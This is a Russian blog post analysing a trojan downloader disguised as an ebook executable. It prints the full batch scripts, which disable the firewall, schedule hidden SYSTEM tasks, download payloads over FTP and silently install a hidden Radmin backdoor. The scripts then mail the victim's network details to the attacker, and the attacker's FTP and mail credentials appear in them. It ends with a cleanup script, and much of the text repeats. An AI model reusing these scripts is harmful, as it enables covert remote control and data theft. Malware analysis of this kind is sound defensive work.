Из этой статьи можно почерпнуть некоторые знания по написанию батников.
Полученный файл: kak_ponyat_muzhchin_bibl.ru.exe (md5:2138A224BDDD1A36329F398A37E10AB9)
Хэш суммы я буду указывать только для вредоносных файлов.
В общем по описанию — это какая-то книга, почему в exe — непонятно, глядим далее.
Воспользуемся PEiD:
UPX 0.89.6 — 1.02 / 1.05 — 2.90 (Delphi) stub -> Markus & Laszlo [RAR SFX]
Попробуем распаковать винраром, получим два файла:
filip_olegovich.exe
и setup.exe (md5:C888FCE716D600EE53D467F7DF2B2475)
Оба упакованы в upx, после распаковки получим следующую картину:
filip_olegovich.exe — собранный в exe pdf-файл, он нас более не интересует.
setup.exe (md5:732FCAA243C007DAA9354AEAF3F6D572) — компиллятор PureBasic 4.x -> Neil Hodgson *, что свойственно для конвертора bat-файлов в исполняемые exe.
Пока оба варианта подозрительного файла загружаются на вирустотал, поглядим ресурсы распакованногоsetup.exe:
Да, это конвертированный батник, который создаст 2 файла и выполнит собственный бат код:
Этот батник запустит службу планировщика задач, остановит службы «центр обеспечения безопасности и оповещения системы безопасности» и «брэндмауэр windows» Далее добавит задание в планировщик, которое будет запускать файл ff.bat каждую минуту, скроет файл задания и снова отключит фаерволл. Разработчик или параноик или диллетант, скорее — второе. Проще говоря, этот файл setup.exe — экземпляр трояна- загрузчика (trojan-downloader), просто несколько импровезированный. Далее рассмотрим два указанных выше файла: Этот текст будет скопирован в %systemroot%/system.bin
А такой код в %systemroot%/ff.bat
%systemroot% — папка windows, в моем случае C:\windows
О чем это может нам сказать?
Прежде всего, файл system.bin — конфиг для фтп-клиента, который зайдет на сервер и скачает определенный файл. (Строки по очереди: логин от сервера, пароль, скачивание файла с сервера, удаление файла на сервере, завершение ftp-сессии)
Что делает файл ff.bat? Во первых останавливает и убирает из автозагрузки две службы: wscsvc — центр обеспечения безопасности и оповещения системы безопасности
SharedAccess — брэндмауэр windows Это не позволяет встроенному фаерволлу заблокировать дальнейшую сетевую активность, а так же блокирует оповещения о брешах в безопасности системы.
Далее поднимает подключение к фтп серверу ftp.on.ufanet.ru с настойками из файла system.bin. После завершения сессии фтп — выполнит файл f.ftp, который скачает с указанного сервера.
Наши файлы setup.exe, кстати, уже проанализировались на virustotal:
Дальше нам нужно получить файлы, которые должны были скачаться с фтп, для этого возьмем логин и пароль и подключимся самостоятельно:
f.bat
system.exe (md5:1ADEF54E08294BC7548C91C8F6CF2032) — RAR SFX архив с таким вот комментарием:
Этот параметр разархивирует в тихом режиме содержимое архива в %SYSTEMROOT%/help/win32
После распаковывания тем же самым раром получаем ни что иное, как сборку скрытого радмина второй версии: raddrv.dll и AdmDll.dll — драйвера Radmin 2
svchost.exe — исполняемый файл Radmin 2
Blat.* — файлы, пренадлежащие консольному почтовому клиенту blat
А вот эти файлы рассмотрим поподробней: install.bat
Разберем комманды по порядку. Прежде всего очередное отключение брэндмауэра и оповещений безопасности, затем повторный запуск службы планировщика задач. Далее — самое вкусное, запуск серверной части Radmin с параметрами, включающими тихую установку, предустановленный пароль а так же запись в реестр параметров сокрытия значка в трее жертвы. Второй ключ задаст имя службы радмина — Service Host Controller
Ну и окончание — запуск самой службы. Таким образом на скомпрометированной системе установлен Radmin с предустановленным паролем и все возможным сокрытием. Далее мы видим запись в реестр данных для отправки почты с помощью почтового клиента blat и добавление всего этого бат-файла в автозагрузку через планировщик заданий. microsoft.bat
Второй батник уже в который раз отключает системный фаерволл, а так же выполняет команду ipconfig /all с сохранением вывода в текстовый файл, который в дальнейшем отправится с помощью blat по адресу ufanetcom2@yandex.ru, короче говоря — отправит ip-адрес для подключения злоумышленника к инфицированной машине.
На этом, в общем-то, все, анализ закончен. Анализ совершенно статичен, запускать в виртуальной среде ничего не пришлось, все банально. Но тем не менее, зайдя на почту я видел большое количество писем с ip-адресами жертв. Ниже будет приведен скрипт AVZ для лечения системы.
и setup.exe (md5:C888FCE716D600EE53D467F7DF2B2475)
Оба упакованы в upx, после распаковки получим следующую картину:
filip_olegovich.exe — собранный в exe pdf-файл, он нас более не интересует.
setup.exe (md5:732FCAA243C007DAA9354AEAF3F6D572) — компиллятор PureBasic 4.x -> Neil Hodgson *, что свойственно для конвертора bat-файлов в исполняемые exe.
Пока оба варианта подозрительного файла загружаются на вирустотал, поглядим ресурсы распакованногоsetup.exe:
Да, это конвертированный батник, который создаст 2 файла и выполнит собственный бат код:
sc config schedule start= auto
sc start schedule
sc config wscsvc start= disabled
sc config SharedAccess start= disabled
sc stop wscsvc
sc stop SharedAccess
schtasks /create /tn «f» /sc minute /mo 1 /ru «NT AUTHORITY\SYSTEM» /tr %systemroot%/ff.bat
attrib +h %systemroot%/tasks/*.* netsh advfirewall set currentprofile state off
C:/isendsms_setup.exe
Этот батник запустит службу планировщика задач, остановит службы «центр обеспечения безопасности и оповещения системы безопасности» и «брэндмауэр windows» Далее добавит задание в планировщик, которое будет запускать файл ff.bat каждую минуту, скроет файл задания и снова отключит фаерволл. Разработчик или параноик или диллетант, скорее — второе. Проще говоря, этот файл setup.exe — экземпляр трояна- загрузчика (trojan-downloader), просто несколько импровезированный. Далее рассмотрим два указанных выше файла: Этот текст будет скопирован в %systemroot%/system.bin
u11631
javasc
get f.bat
del check.txt
bye
А такой код в %systemroot%/ff.bat
sc config wscsvc start= disabled
sc config SharedAccess start= disabled
sc stop wscsvc sc stop SharedAccess
ftp -s:C:\WINDOWS/system.bin ftp.on.ufanet.ru f.bat
%systemroot% — папка windows, в моем случае C:\windows
О чем это может нам сказать?
Прежде всего, файл system.bin — конфиг для фтп-клиента, который зайдет на сервер и скачает определенный файл. (Строки по очереди: логин от сервера, пароль, скачивание файла с сервера, удаление файла на сервере, завершение ftp-сессии)
Что делает файл ff.bat? Во первых останавливает и убирает из автозагрузки две службы: wscsvc — центр обеспечения безопасности и оповещения системы безопасности
SharedAccess — брэндмауэр windows Это не позволяет встроенному фаерволлу заблокировать дальнейшую сетевую активность, а так же блокирует оповещения о брешах в безопасности системы.
Далее поднимает подключение к фтп серверу ftp.on.ufanet.ru с настойками из файла system.bin. После завершения сессии фтп — выполнит файл f.ftp, который скачает с указанного сервера.
Наши файлы setup.exe, кстати, уже проанализировались на virustotal:
Дальше нам нужно получить файлы, которые должны были скачаться с фтп, для этого возьмем логин и пароль и подключимся самостоятельно:
f.bat
system.exe (md5:1ADEF54E08294BC7548C91C8F6CF2032) — RAR SFX архив с таким вот комментарием:
path=%SYSTEMROOT%/help/win32 silent=1 overwrite=1 setup=install.bat
Этот параметр разархивирует в тихом режиме содержимое архива в %SYSTEMROOT%/help/win32
После распаковывания тем же самым раром получаем ни что иное, как сборку скрытого радмина второй версии: raddrv.dll и AdmDll.dll — драйвера Radmin 2
svchost.exe — исполняемый файл Radmin 2
Blat.* — файлы, пренадлежащие консольному почтовому клиенту blat
А вот эти файлы рассмотрим поподробней: install.bat
@echo off
sc config wscsvc start= disabled
sc stop wscsvc
sc config SharedAccess start= disabled
sc stop SharedAccess
sc config schedule start= auto
sc start schedule
svchost.exe /install /silence
svchost.exe /pass:12345678125 /save /silence
REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d «Service Host Controller» /f
svchost.exe /stop
svchost.exe /start
blat.exe -install -server smtp.yandex.ru -port 587 -f ufanetcom2@yandex.ru -u ufanetcom2 -pw javascriptsc
schtasks /create /tn «security» /sc minute /mo 15 /ru «NT AUTHORITY\SYSTEM» /tr %SYSTEMROOT%/help/win32/microsoft.bat
attrib +h %systemroot%/tasks/*.*
exit
Разберем комманды по порядку. Прежде всего очередное отключение брэндмауэра и оповещений безопасности, затем повторный запуск службы планировщика задач. Далее — самое вкусное, запуск серверной части Radmin с параметрами, включающими тихую установку, предустановленный пароль а так же запись в реестр параметров сокрытия значка в трее жертвы. Второй ключ задаст имя службы радмина — Service Host Controller
Ну и окончание — запуск самой службы. Таким образом на скомпрометированной системе установлен Radmin с предустановленным паролем и все возможным сокрытием. Далее мы видим запись в реестр данных для отправки почты с помощью почтового клиента blat и добавление всего этого бат-файла в автозагрузку через планировщик заданий. microsoft.bat
sc config SharedAccess start= disabled
sc stop SharedAccess
ipconfig /all>%SYSTEMROOT%\Help\win32/ip.txt
%SYSTEMROOT%/help/win32/blat.exe %systemroot%/help/win32/ip.txt -to ufanetcom2@yandex.ru. exit
Второй батник уже в который раз отключает системный фаерволл, а так же выполняет команду ipconfig /all с сохранением вывода в текстовый файл, который в дальнейшем отправится с помощью blat по адресу ufanetcom2@yandex.ru, короче говоря — отправит ip-адрес для подключения злоумышленника к инфицированной машине.
На этом, в общем-то, все, анализ закончен. Анализ совершенно статичен, запускать в виртуальной среде ничего не пришлось, все банально. Но тем не менее, зайдя на почту я видел большое количество писем с ip-адресами жертв. Ниже будет приведен скрипт AVZ для лечения системы.
begin SearchRootkit(true, true); SetAVZGuardStatus(True); StopService('r_server'); DeleteService('r_server', true ); TerminateProcessByName('c:\windows\help\win32\svchost.exe'); DeleteFile('C:\WINDOWS\ff.bat'); DeleteFile('C:\WINDOWS\SYSTEM.DLL'); DeleteFileMask('C:\WINDOWS\help\win32', '*.*', true); BC_ImportAll; ExecuteSysClean; ExecuteWizard('TSW',2,3,true); BC_Activate; RebootWindows(true); end.
Комментариев нет:
Отправить комментарий
Примечание. Отправлять комментарии могут только участники этого блога.